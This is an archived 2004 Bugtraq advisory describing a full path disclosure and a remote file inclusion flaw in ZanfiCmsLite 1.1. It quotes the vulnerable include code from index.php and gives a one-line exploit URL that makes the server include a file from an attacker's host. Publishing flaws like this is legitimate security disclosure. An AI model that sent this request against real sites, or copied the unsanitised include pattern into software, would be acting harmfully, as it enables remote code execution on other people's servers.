[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20041011125948.8423.qmail@www.securityfocus.com>
Date: 11 Oct 2004 12:59:48 -0000
From: Lin Xiaofeng <Cracklove@...il.Com>
To: bugtraq@...urityfocus.com
Subject: Multiple vulnerabilities in ZanfiCmsLite
**********************************
*AuThor:Cracklove *
*emA!l:Cracklove[at]Gmail[dot]Com*
*HoMePaGe:http://ProxySky.com *
**********************************
[Info]
Website: http://www.zanfi.nl
Version: 1.1,The Newest Version
Problem: Full path disclosure,Include file
[Vuls]
1.Full path disclosure:
Let's try to request like this:
http://localhost/cms/adm_pages.php
and we get standard error messages like that:
Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in c:\appserv\www\cms\adm_pages.php on line 2
No blocks in the table
The Problem also in corr_pages.php,del_block.php,del_page.php,footer.php,home.php etc.
2.Include file
Ok let's open ./index.php,We see
if (!isset($inc)):
include ("home.php");
else:
include ($inc.".php");
endif;
O Yeah!See u Again Include Vul!
[Exploit]
http://target/index.php?inc=http://[Attacker]
[Fix]
Vuls has been reported to autuor,No reply yet.
[Greetings]
Greets To Lcx,Fatb,Envymask,S4T,ITS,CHT,WDYL,~The WhackerZ~ TeAm.
http://www.proxysky.com/vulz/show.php?id=3
Powered by blists - more mailing lists